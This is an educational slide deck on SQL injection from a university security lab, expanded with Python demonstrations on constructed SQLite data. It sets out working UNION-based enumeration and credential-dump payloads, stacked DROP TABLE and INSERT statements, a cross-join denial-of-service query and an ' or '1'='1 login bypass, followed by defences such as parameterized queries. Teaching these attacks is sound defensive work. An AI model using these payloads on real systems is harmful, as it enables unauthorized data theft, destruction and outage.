A Brief Introduction in SQL Injection
Security Lab, University Putra Malaysia
23 May 2013
Sina Manavi
Contact: http://sinamanavi.blogspot.com/p/about-me.html
• Introduction
• Why SQL Injection
• What is needed for this
• What you can do with SQL Injection
• What are its pros and cons
• Why we need to know and how we can prevent our
database from SQL injection attacks
We are all familiar with SQL
It is one of the technologies that turned the static web into a dynamic one
SQL is relatively easy to read, a little more difficult to write
It runs on database servers such as MySQL and Microsoft SQL Server; the web server (Apache, IIS) only hands the application's queries to them
SQL injection means manipulating the SQL an application sends, and through it the tables behind the application, without authorization
• SQL injection usually arrives through one of two kinds of input, a form or a URL (anything else the application copies into a query, such as a cookie or an HTTP header, is exposed in the same way):
◦ (1) Injecting into a form, such as the username and password boxes on a login page.
◦ (2) Injecting into a URL parameter, like http://yourtarget.com/products/list.php?pid=10
• Simple example, a login check:
SELECT ID FROM tbl_users
WHERE ID='Uid' AND pass='pass'
◦ If the query returns any row, the application treats the supplied inputs as correct; the attacker's aim is to make it return a row without knowing a valid pair
• www.yourtarget.com/list?id=5
• To show one record, the page builds a query from the URL parameter; this is the query a URL-based injection rewrites:
SELECT * FROM tbl_users
WHERE id=5
• INFORMATION_SCHEMA is the standard catalogue (MySQL, Microsoft SQL Server, PostgreSQL) that lists every table and column the current database user is allowed to see; its name never changes, so an attacker does not have to guess it.
◦ Table holding all the table names:
INFORMATION_SCHEMA.TABLES
◦ Table holding all the column names:
INFORMATION_SCHEMA.COLUMNS
• Finding the number of columns the page's query selects:
◦ www.yourtarget.com/list.php?ID=10+ORDER+BY+1--
Increase the 1 until the page errors; the last number that worked is the column count. A UNION is only accepted when both sides select the same number of columns, so this number is needed for every later step. The trailing -- comments out whatever the application appends after the parameter (MySQL only treats -- as a comment when a space follows it, so in a URL write --+, the + being a space).
• Finding table names:
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES--
The -1 matches no real record, so the page shows only the UNION rows; table_name has to sit in a column the page actually displays (the second one here). The page shows:
tbl_user
To be continued
• Now find the column names:
www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user'--
• The result would be:
id,username,password
• If the page displays only one row at a time, walk the columns one by one, asking each time for a name after the one just displayed:
www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user'+AND+column_name>'displayed_column'--
Repeat, substituting the name just shown, until you reach the column you are after (e.g. username, password, or login)
• And finally the records:
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,username,3+FROM+tbl_user--
• And
◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,password,3+FROM+tbl_user--
◦ Username=admin password=123456
◦ Stupid admin, ha ;)
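The enumeration of slides 9 to 11 carried out end to end, as an added example that is not part of the original talk. SQLite stands in for MySQL so it runs offline: its sqlite_master table and pragma_table_info() function take the place of INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS. The products and tbl_user tables and their rows are constructed sample data, and list_products() is an assumed stand-in for the vulnerable list.php handler.

```python
import sqlite3

# Constructed sample target standing in for the slides' www.yourtarget.com.
# SQLite is used so the example runs offline: its sqlite_master table and
# pragma_table_info() function play the role that INFORMATION_SCHEMA.TABLES
# and INFORMATION_SCHEMA.COLUMNS play on the slides (MySQL).
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
INSERT INTO products VALUES (10, 'widget', '9.99'), (11, 'gadget', '19.99');
CREATE TABLE tbl_user (id INTEGER, username TEXT, password TEXT);
INSERT INTO tbl_user VALUES (1, 'admin', '123456'), (2, 'bob', 'hunter2');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_products(conn, pid):
    """Assumed stand-in for the vulnerable list.php?ID=... handler: the raw
    parameter is spliced into the SQL text, exactly the bug the slides exploit."""
    return conn.execute("SELECT id, name, price FROM products WHERE id=" + pid).fetchall()


def count_columns(conn, limit=10):
    """Slide 9: raise ORDER BY n until the database errors; the last n that
    worked is the number of columns the page's query selects."""
    for n in range(1, limit + 1):
        try:
            list_products(conn, f"10 ORDER BY {n}--")
        except sqlite3.OperationalError:  # "ORDER BY term out of range"
            return n - 1
    return limit


def union_payload(cols, expr, source, where=None):
    """Slides 9-11: build '-1 UNION SELECT 1,<expr>,3 FROM <source>--' for any
    column count. -1 matches no product, so only the UNION rows come back, and
    <expr> is placed in column 2, the column the page displays."""
    parts = [str(i) for i in range(1, cols + 1)]
    parts[1] = expr
    payload = f"-1 UNION SELECT {', '.join(parts)} FROM {source}"
    if where:
        payload += f" WHERE {where}"
    return payload + "--"


def table_names(conn, cols):
    """Slide 9, second step: list the tables (sqlite_master for INFORMATION_SCHEMA.TABLES)."""
    rows = list_products(conn, union_payload(cols, "name", "sqlite_master", "type='table'"))
    return sorted(r[1] for r in rows)


def column_names(conn, cols, table):
    """Slide 10, first form: all column names in one row, 'id,username,password'."""
    rows = list_products(conn, union_payload(
        cols, "group_concat(name)", f"pragma_table_info('{table}')"))
    return rows[0][1]


def walk_columns(conn, cols, table):
    """Slide 10, second form: when the page shows a single row, ask repeatedly for
    the smallest column name greater than the one shown last."""
    seen, last = [], ""
    while True:
        rows = list_products(conn, union_payload(
            cols, "min(name)", f"pragma_table_info('{table}')", f"name > '{last}'"))
        last = rows[0][1]
        if last is None:  # nothing left after the last name seen
            return seen
        seen.append(last)


def dump_credentials(conn, cols, table):
    """Slide 11: read the discovered username and password columns."""
    rows = list_products(conn, union_payload(cols, "username || ':' || password", table))
    return sorted(r[1] for r in rows)


if __name__ == "__main__":
    conn = connect()
    cols = count_columns(conn)                                   # 3
    print("columns in the page's query:", cols)
    print("tables:", table_names(conn, cols))                    # ['products', 'tbl_user']
    print("columns of tbl_user:", column_names(conn, cols, "tbl_user"))
    print("walked one by one:", walk_columns(conn, cols, "tbl_user"))
    print("records:", dump_credentials(conn, cols, "tbl_user"))  # admin:123456, bob:hunter2
```

The one-by-one walk returns the columns in alphabetical order (id, password, username) rather than table order, because it sorts on the name it compares against; that is why the single-shot group_concat form is preferred whenever the page displays more than one row.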
• The records can be altered as well, if a second statement can be appended to the injected one:
UPDATE tbl_user
SET password = SHA2('$password', 256)
WHERE id = $id
Or a new user can be added with an INSERT statement. Whether a second statement can be stacked this way depends on the driver, not on SQL: MySQL through PHP's mysql_query() runs one statement per call, while Microsoft SQL Server drivers generally accept a batch.
If user_list holds 1000 records, this query makes the database build the cross product of six copies of it (a JOIN with no ON clause is a cross join): 1000^6 = 10^18 rows, enough to tie the server up. It is a single SELECT, so with a matching column list it can be injected through UNION inside the query the page already runs; no second statement is needed. (MySQL requires an alias for each repeated table.)
SELECT * FROM user_list u1 JOIN user_list u2
JOIN user_list u3 JOIN user_list u4 JOIN user_list u5
JOIN user_list u6
Inserting a new user:
INSERT INTO tbl_user (username, password) VALUES ('newuser', 'newpass')
And the malicious code can simply be destructive:
DROP TABLE tbl_user
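Slides 13 and 14 side by side, as an added example that is not from the original talk: the cross-join blow-up delivered through the page's own SELECT, and the appended DROP TABLE, which succeeds or fails depending on the API the application calls, not on the SQL. The user_list table is constructed sample data, show_user() is an assumed stand-in for the vulnerable page, and SQLite stands in for MySQL.

```python
import sqlite3


# Constructed user_list table; SQLite stands in for MySQL so the example runs offline.
def connect(rows=30):
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_list (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO user_list VALUES (?, ?)",
                     [(i, f"user{i}") for i in range(rows)])
    return conn


def show_user(conn, uid):
    """Assumed stand-in for the vulnerable page: the id parameter is spliced into the SQL."""
    return conn.execute("SELECT id, username FROM user_list WHERE id=" + uid).fetchall()


def cross_join_payload(copies):
    """Slide 13: a JOIN with no ON clause is a cross join, so joining k copies of an
    n-row table makes the database walk n**k rows. Delivered through UNION it fits
    inside the one SELECT the page already runs, so no second statement is needed."""
    source = " JOIN ".join(f"user_list u{i}" for i in range(copies))
    return f"-1 UNION SELECT 1, count(*) FROM {source}--"


def rows_visited(conn, copies):
    """Rows the database had to walk for the injected cross join."""
    return show_user(conn, cross_join_payload(copies))[0][1]


def projected_rows(table_rows, copies):
    """The slide's own numbers: 1000 records, six copies."""
    return table_rows ** copies


def stacked_drop(conn):
    """Slide 14: DROP TABLE appended as a second statement. Whether it runs is a
    property of the driver call, not of SQL: Python's execute(), like PHP's
    mysql_query(), accepts exactly one statement and refuses the whole call."""
    try:
        show_user(conn, "1; DROP TABLE user_list")
        return "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return "refused"


def stacked_drop_batch_api(conn):
    """The same input through an API that accepts batches (executescript() here,
    mysqli_multi_query() in PHP) runs both statements and drops the table."""
    conn.executescript("SELECT id, username FROM user_list WHERE id=" + "1; DROP TABLE user_list")


def table_exists(conn):
    return conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE name='user_list'").fetchone()[0] == 1


if __name__ == "__main__":
    conn = connect()
    for k in (1, 2, 3):
        print(k, "copies ->", rows_visited(conn, k), "rows")       # 30, 900, 27000
    print("slide 13's query would walk", projected_rows(1000, 6), "rows")
    print("stacked DROP via execute():", stacked_drop(conn), "| table exists:", table_exists(conn))
    stacked_drop_batch_api(conn)
    print("via executescript(): table exists:", table_exists(conn))  # False
```

The lesson a practitioner should take from the two halves: the absence of stacked queries in a driver removes one payload shape, not the vulnerability; everything that fits in a single SELECT, including the denial of service, still goes through.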
• How it works
SELECT * FROM tbl_users
WHERE id='Fname' AND pass='pass'
• Malicious input: typing ' or '1'='1 into the password box makes the application build:
SELECT * FROM tbl_users WHERE id='Fname' AND pass='' or '1'='1';
if(mysql_num_rows($result))
//do login
AND binds tighter than OR, so the condition reads (id='Fname' AND pass='') OR '1'='1', which is true for every row: the query returns rows, mysql_num_rows() is non-zero, and the unauthorized user is logged in without a valid password. Authentication has been bypassed.
• Security is the developer's job
• No database, connector, or framework can prevent SQL injection all the time
• Implement proper error handling: show users one generic message for every error and keep the database's own error text in server-side logs (the column-counting step above depends on seeing that error).
• Lock down the database account the application uses: define users, roles and permissions, and grant the web application's account only what it needs (no DROP or ALTER, no rights on tables it never touches).
• Never splice input into SQL text; pass values as bound parameters of a prepared statement. Where SQL must still be built as a string, quote every input, even numeric data, and escape it with the driver's own function, because an unquoted number such as WHERE id = $id cannot be protected by escaping at all.
<?php
// Escaping example from the slides. The mysql_* extension it relies on was removed in PHP 7;
// current code uses mysqli or PDO with prepared statements instead.
function sanitize($string){
$string = strip_tags($string);               // these two change the value: a password
$string = htmlspecialchars($string);         // containing < or & is silently rewritten
$string = trim(rtrim(ltrim($string)));       // trim() alone already strips both ends
$string = mysql_real_escape_string($string); // the only step that matters for SQL
return $string;
}
$password = sanitize( $_POST["password"] );
// $password is escaped and quoted, but $user_id is interpolated bare and unchecked:
// a value such as "1 OR 1=1" resets every user's password.
mysql_query("UPDATE Users
SET password = '$password'
WHERE user_id = $user_id");
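The bypass of slide 15 next to the escaping approach of slides 17 and 18 and its parameterized replacement, as an added example that is not from the original deck. The tbl_users table and its two rows are constructed, escape_quotes() is an assumed hand-written escaper standing in for mysql_real_escape_string(), and SQLite stands in for MySQL so the code runs offline.

```python
import sqlite3


# Constructed login table standing in for the slides' tbl_users; SQLite is used
# in place of MySQL so the example runs offline.
def connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_users (id INTEGER, username TEXT, pass TEXT)")
    conn.executemany("INSERT INTO tbl_users VALUES (?, ?, ?)",
                     [(1, "admin", "123456"), (2, "bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Slide 15: both inputs are pasted into the SQL text."""
    sql = f"SELECT * FROM tbl_users WHERE username='{username}' AND pass='{password}'"
    return len(conn.execute(sql).fetchall()) > 0  # the slide's mysql_num_rows() test


def escape_quotes(value):
    """Assumed hand-rolled escaper of the kind slide 18 builds: doubles each single
    quote. Enough for SQLite here; a real driver escaper also handles backslashes
    and character-set issues, which is why writing your own is one of the myths."""
    return value.replace("'", "''")


def login_escaped(conn, username, password):
    """Slide 18's approach: still string building, but every input escaped and quoted."""
    sql = (f"SELECT * FROM tbl_users WHERE username='{escape_quotes(username)}' "
           f"AND pass='{escape_quotes(password)}'")
    return len(conn.execute(sql).fetchall()) > 0


def update_password_escaped(conn, user_id, new_password):
    """Slide 18's UPDATE: the password is escaped and quoted, the id is neither.
    Returns the number of rows changed."""
    sql = f"UPDATE tbl_users SET pass='{escape_quotes(new_password)}' WHERE id={user_id}"
    return conn.execute(sql).rowcount


def login_parameterized(conn, username, password):
    """The fix: the SQL text is constant and the values travel separately as bound
    parameters, so no input can change the query's structure."""
    row = conn.execute("SELECT 1 FROM tbl_users WHERE username=? AND pass=?",
                       (username, password)).fetchone()
    return row is not None


def update_password_parameterized(conn, user_id, new_password):
    """Same for the UPDATE; the id is also type-checked, which the slide's code skips."""
    return conn.execute("UPDATE tbl_users SET pass=? WHERE id=?",
                        (new_password, int(user_id))).rowcount


if __name__ == "__main__":
    conn = connect()
    print(login_vulnerable(conn, "nobody", "' or '1'='1"))      # True: in without a password
    print(login_escaped(conn, "nobody", "' or '1'='1"))         # False: the quote is now data
    print(update_password_escaped(conn, "1 OR 1=1", "pwned"))   # 2: every password reset
    print(login_parameterized(conn, "nobody", "' or '1'='1"))   # False
```

Escaping closes the quoted-string hole and leaves the numeric one open; parameters close both, and int() on the id rejects "1 OR 1=1" before it reaches the database. Password hashing is left out so the comparison stays on the injection itself.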
Vipin Samar, Oracle vice president of Database Security:
“Database Firewall is a good first layer of defense for databases but it won't protect you from everything.”
• Using stored procedures:
CREATE PROCEDURE SP_show_user(IN U_ID INT)
BEGIN
SELECT * FROM Bugs WHERE User_ID = U_ID;
END
CALL SP_show_user(54)
“Might be helpful but still vulnerable”: this procedure is safe because U_ID is only ever used as a value, but the application must still bind the argument to the CALL rather than paste input into it, and a procedure that assembles SQL text from its arguments (PREPARE ... EXECUTE) is as injectable as any other dynamic query.
Myths, none of which is the whole fix:
• I don't have to worry anymore
• Escaping is the fix
• More escaping is better
• I can code an escaping function
• Only user input is unsafe
• Stored procs are the fix
• SQL privileges are the fix
• My app doesn't need security
• Frameworks are the fix
• Parameters quote for you
• Parameters are the fix
• Parameters make queries slow
• SQL proxies are the fix
• NoSQL databases are the fix
“NoSQL databases are immune to SQL injection.” They are not: any store that assembles a query from application strings, whatever its query language, can be injected in the same way.


Editor's Notes

1. Tables are related to each other. Inserting rows into tables through unauthorized access.